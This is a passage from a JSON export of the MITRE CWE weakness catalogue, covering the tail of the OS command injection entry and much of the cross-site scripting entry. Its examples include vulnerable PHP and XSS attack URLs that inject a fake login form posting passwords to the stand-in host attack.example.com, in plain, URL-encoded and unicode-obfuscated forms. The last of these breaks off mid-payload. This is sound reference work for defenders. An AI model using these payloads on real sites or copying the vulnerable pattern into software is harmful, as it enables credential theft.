whose pathname contains shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1988"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"OS Command Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":31,"Entry_Name":"OS Commanding"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS07-J","Entry_Name":"Do not pass untrusted, unsanitized data to the Runtime.exec() method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-78"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-685"}},{"attr":{"@_External_Reference_ID":"REF-686"}},{"attr":{"@_External_Reference_ID":"REF-687","@_Section":"chapter: &#34;CGI Scripts&#34;"}},{"attr":{"@_External_Reference_ID":"REF-688"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 10: Command Injection.&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-690"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Shell Metacharacters&#34;, Page 425"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-78"}}]},"Notes":{"Note":[{"#text":"The \\"OS command injection\\" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an \\"-exec\\" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX \\"find\\" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.","attr":{"@_Type":"Terminology"}},{"#text":"More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"OS Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into an OS Command (aka \'OS Command Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve OS Command Structure (aka \'OS Command Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve OS Command Structure (\'OS Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an OS Command (\'OS Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"79":{"attr":{"@_ID":"79","@_Name":"Improper Neutralization of Input During Web Page Generation (\'Cross-site Scripting\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.","Extended_Description":{"xhtml:p":["Cross-site scripting (XSS) vulnerabilities occur when:","There are three main kinds of XSS:","Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim\'s account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim\'s machine, sometimes referred to as \\"drive-by hacking.\\"","In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious."],"xhtml:ol":{"xhtml:li":["Untrusted data enters a web application, typically from a web request.","The web application dynamically generates a web page that contains this untrusted data.","During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.","A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.","Since the script comes from a web page that was sent by the web server, the victim\'s web browser executes the malicious script in the context of the web server\'s domain.","This effectively violates the intention of the web browser\'s same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain."]},"xhtml:ul":{"xhtml:li":[{"#text":"- \\n         \\t\\t\\tThe server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker\'s content back to the victim, the content is executed by the victim\'s browser.","xhtml:b":"Type 1: Reflected XSS (or Non-Persistent)"},{"#text":"- \\n               The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker\'s perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.","xhtml:b":"Type 2: Stored XSS (or Persistent)"},{"#text":"- \\n               In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.","xhtml:b":"Type 0: DOM-Based XSS"}]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"494","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Background_Details":{"Background_Detail":{"xhtml:div":[{"#text":"Same Origin Policy","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Domain","attr":{"@_style":"color:#32498D; font-weight:bold;"}}],"xhtml:p":["The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or \\"origin\\", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or \\"origins\\". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.","The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user\'s interactions with this particular site."]}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XSS","Description":"\\"XSS\\" is a common abbreviation for Cross-Site Scripting."},{"Term":"HTML Injection","Description":"\\"HTML injection\\" is used as a synonym of stored (Type 2) XSS."},{"Term":"CSS","Description":"In the early years after initial discovery of XSS, \\"CSS\\" was a commonly-used acronym.  However, this would cause confusion with \\"Cascading Style Sheets,\\" so usage of this acronym has declined significantly."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some circumstances it may be possible to run arbitrary code on a victim\'s computer when cross-site scripting is combined with other flaws."},{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data"],"Note":"The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running \\"Active X\\" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.","Effectiveness":"Moderate"},{"Method":"Black Box","Description":"Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.","Effectiveness":"Moderate","Effectiveness_Notes":"With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft\'s Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket."]}},{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.","For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.","Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:","etc. Note that HTML Entity Encoding is only appropriate for the HTML body.","Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["HTML body","Element attributes (such as src=\\"XYZ\\")","URIs","JavaScript sections","Cascading Style Sheets and style property"]}}}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Effectiveness":"Limited","Effectiveness_Notes":"This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":"If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon (\\"&lt;3\\") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the \\"&lt;\\" character, which would need to be escaped or otherwise handled. In this case, stripping the \\"&lt;\\" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.","Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_GET[\'username\'];echo \'&lt;div class=\\"header\\"&gt; Welcome, \' . $username . \'&lt;/div&gt;\';","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=&lt;Script Language=\\"Javascript\\"&gt;alert(\\"You\'ve been attacked!\\");&lt;/Script&gt;"},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=&lt;div id=\\"stealPassword\\"&gt;Please Login:&lt;form name=\\"input\\" action=\\"http://attack.example.com/stealPassword.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;br/&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;&lt;/div&gt;"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome, &lt;div id=\\"stealPassword\\"&gt; Please Login:&lt;/div&gt;&lt;/div&gt;","xhtml:div":{"#text":"&lt;form name=\\"input\\" action=\\"attack.example.com/stealPassword.php\\" method=\\"post\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;br/&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=&lt;script+type=\\"text/javascript\\"&gt;document.write(\'\\\\u003C\\\\u0064\\\\u0069\\\\u0076\\\\u0020\\\\u0069\\\\u0064\\\\u003D\\\\u0022\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u003E\\\\u0050\\\\u006C\\\\u0065\\\\u0061\\\\u0073\\\\u0065\\\\u0020\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u003A\\\\u003C\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0022\\\\u0020\\\\u0061\\\\u0063\\\\u0074\\\\u0069\\\\u006F\\\\u006E\\\\u003D\\\\u0022\\\\u0068\\\\u0074\\\\u0074\\\\u0070\\\\u003A\\\\u002F\\\\u002F\\\\u0061\\\\u0074\\\\u0074\\\\u0061\\\\u0063\\\\u006B\\\\u002E\\\\u0065\\\\u0078\\\\u0061\\\\u006D\\\\u0070\\\\u006C\\\\u0065\\\\u002E\\\\u0063\\\\u006F\\\\u006D\\\\u002F\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u002E\\\\u0070\\\\u0068\\\\u0070\\\\u0022\\\\u0020\\\\u006D\\\\u0065\\\\u0074\\\\u0068\\\\u006F\\\\u0064\\\\u003D\\\\u0022\\\\u0070\\\\u006F\\\\u0073\\\\u0074\\\\u0022\\\\u003E\\\\u0055\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0074\\\\u0065\\\\u0078\\\\u0074\\\\u0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0075\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0062\\\\u0072\\\\u002F\\\\u003E\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u